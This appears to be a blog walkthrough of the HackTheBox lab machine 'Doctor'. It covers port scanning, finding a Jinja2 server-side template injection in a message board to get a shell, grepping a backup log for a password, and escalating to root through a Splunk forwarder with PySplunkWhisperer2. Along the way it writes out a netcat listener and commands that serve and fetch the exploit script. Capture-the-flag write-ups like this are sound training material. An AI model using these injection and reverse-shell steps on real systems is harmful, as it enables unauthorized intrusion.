Introduction

Doctor is easy level machine released on 26 September2020 on HacTheBox and created by egotisticalSW

The blog is for educational purposes only.

Enumeration

IP-: 10.10.10.209

As always, I added IP In hosts file.

Lets start with Port Scanning

Nmap

softwareuser@parrot:~ sudo nmap -sC -sS -sV -T4 -A -oN nmap/intial_scan doctor.htb

-sC for default scripts
-sV for Version detection
-sS for SYN scan
-T4 for speeding up Scan
-A for Advanced and Aggressive features
-oN for Output

lnmap is just my alias to print only open ports from result file

Web Page

A simple web page and links aren’t working

but we got a subdomain

let’s add this domain to our hosts (/etc/hosts) file

1 2Send us a message info@doctors.htb

doctors.htb

A Login and Register page

Let’s register

Let’s Login with email and password that we used to register

Nothing it’s blank lets source-code and i found something linked with /archive

1 2<!–archive still under beta testing<a class=”nav-item nav-link” href=”/archive”>Archive</a>–>  

Let’s check /archive

/archive is also blank page

but on webpage we can see a option of New Message

Let’s Try to post a message with `<h1>` tag

and we get a response your post has been created

we can try to check it on /archive

as we can see our message is there and on this point i was sure that i have to work bit more and i can execute command or payload at /archive lets try some other tags too

Let’s post this Message

1 2 3</title></item><h1>software</h1> </title></item><h1>user</h1>

it worked

source code

it’s vunlreable by SSTI(Server-Side Template Injection) Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. Read More about SSTI

we have to identify which template is web page using so a picture from this article explains everything easily

so i started trying every payload to find out which template is web app using and finally i found thats Jinja2 with this payload ` curly bracket curly bracket 5*apostrophe5apostrophe curly bracket curly bracket ` for more about check this jinja2 let’s try other payload to confirm that is jinja2 hehe

let’s check /archive again

thats working now i have to Exploit the SSTI by calling Popen without guessing the offset

Payload

Let’s create a new message with payload

Let’s post Message

now let’s access the /archive we got a shell as web@doctor

Web (Shell)

we don’t have permission to read user.txt we have tp enumerate more after some time i found some log files but there is an backup so i found creds in that file of probably user shaun because shaun contains our user.txt

1cat backup | grep -iE “password”

got user

Root Part

As always i will run linPEAS after running linPEAS i found splunk is running

Splunk forwarder is one of the components of splunk infrastructure. Splunk forwarder basically acts as agent for log collection from remote machines .Splunk forwarder collects logs from remote machines and forward s them to indexer (Splunk database) for further processing and storage. Read more about splunk here splunk

After googling i found an script which can be used here for privilege escalation PySplunkWhisperer2

PySplunkWhisperer2

we have to start a netcat listener and then we have to run PySplunkWhisperer2 on our system

 nc -lnvp 5006 # you’r machine python3 -m http.server 80 # you’r machine wget http://10.10.xx.xxx:80/PySplunkWhisperer2_remote.py # your machine  

Let’s run netcat listener

Let’s run PySplunkWhisperer2 to get shell

payload

we got a shell

now we can read root.txt

Thank you for reading my blog if you have any suggestions feel free to contact me on twitter].

Author

0xSoftware User